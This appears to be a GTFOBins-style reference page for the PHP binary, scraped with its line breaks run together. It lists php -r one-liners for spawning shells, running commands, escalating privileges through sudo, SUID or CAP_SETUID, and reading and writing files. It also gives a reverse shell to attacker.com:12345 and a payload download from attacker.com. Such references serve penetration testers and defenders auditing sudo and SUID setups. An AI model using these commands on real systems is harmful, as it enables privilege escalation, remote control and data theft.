This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
php -r 'system("/bin/sh -i");'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -r 'system("/bin/sh -i");'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -r 'system("/bin/sh -i");'This function is performed bypassing the usual kernel permission checks if the executable has certain capabilities set.
The following capabilities are needed:
CAP_SETUID.
php -r 'posix_setuid(0); system("/bin/sh -i");'This function can be performed by any unprivileged user.
php -r 'passthru("/bin/sh -i");'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -r 'passthru("/bin/sh -i");'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -r 'passthru("/bin/sh -i");'This function is performed bypassing the usual kernel permission checks if the executable has certain capabilities set.
The following capabilities are needed:
CAP_SETUID.
php -r 'posix_setuid(0); passthru("/bin/sh -i");'This function can be performed by any unprivileged user.
php -r '$h=@popen("/bin/sh -i","r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -r '$h=@popen("/bin/sh -i","r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -r '$h=@popen("/bin/sh -i","r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'This function is performed bypassing the usual kernel permission checks if the executable has certain capabilities set.
The following capabilities are needed:
CAP_SETUID.
php -r 'posix_setuid(0); $h=@popen("/bin/sh -i","r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'This function can be performed by any unprivileged user.
php -r "pcntl_exec('/bin/sh');"This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -r "pcntl_exec('/bin/sh');"This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -r "pcntl_exec('/bin/sh', ['-p']);"This function is performed bypassing the usual kernel permission checks if the executable has certain capabilities set.
The following capabilities are needed:
CAP_SETUID.
php -r 'posix_setuid(0); system("/bin/sh -i");'This executable can run non-interactive system commands.
This function can be performed by any unprivileged user.
php -r 'echo shell_exec("/path/to/command");'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -r 'echo shell_exec("/path/to/command");'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -r 'echo shell_exec("/path/to/command");'This function can be performed by any unprivileged user.
php -r '$r=array(); exec("/path/to/command", $r); print(join("\n",$r));'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -r '$r=array(); exec("/path/to/command", $r); print(join("\n",$r));'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -r '$r=array(); exec("/path/to/command", $r); print(join("\n",$r));'This function can be performed by any unprivileged user.
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open("/path/to/command", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open("/path/to/command", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open("/path/to/command", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'This executable can send back a reverse system shell to a listening attacker.
This function can be performed by any unprivileged user.
php -r '$sock=fsockopen("attacker.com",12345);exec("/bin/sh -i 0<&3 1>&3 2>&3");'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -r '$sock=fsockopen("attacker.com",12345);exec("/bin/sh -i 0<&3 1>&3 2>&3");'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -r '$sock=fsockopen("attacker.com",12345);exec("/bin/sh -i 0<&3 1>&3 2>&3");'This executable can write data to local files.
This function can be performed by any unprivileged user.
php -r 'file_put_contents("/path/to/output-file", "DATA");'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -r 'file_put_contents("/path/to/output-file", "DATA");'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -r 'file_put_contents("/path/to/output-file", "DATA");'This executable can read data from local files.
This function can be performed by any unprivileged user.
php -r 'readfile("/path/to/input-file");'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -r 'readfile("/path/to/input-file");'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -r 'readfile("/path/to/input-file");'This executable can upload local data.
This function can be performed by any unprivileged user.
php -S 0.0.0.0:80This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -S 0.0.0.0:80This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -S 0.0.0.0:80This executable can download remote data.
This function can be performed by any unprivileged user.
php -r '$c=file_get_contents("http://attacker.com/path/to/input-file"); file_put_contents("/path/to/output-file", $c);'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
php -r '$c=file_get_contents("http://attacker.com/path/to/input-file"); file_put_contents("/path/to/output-file", $c);'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
php -r '$c=file_get_contents("http://attacker.com/path/to/input-file"); file_put_contents("/path/to/output-file", $c);'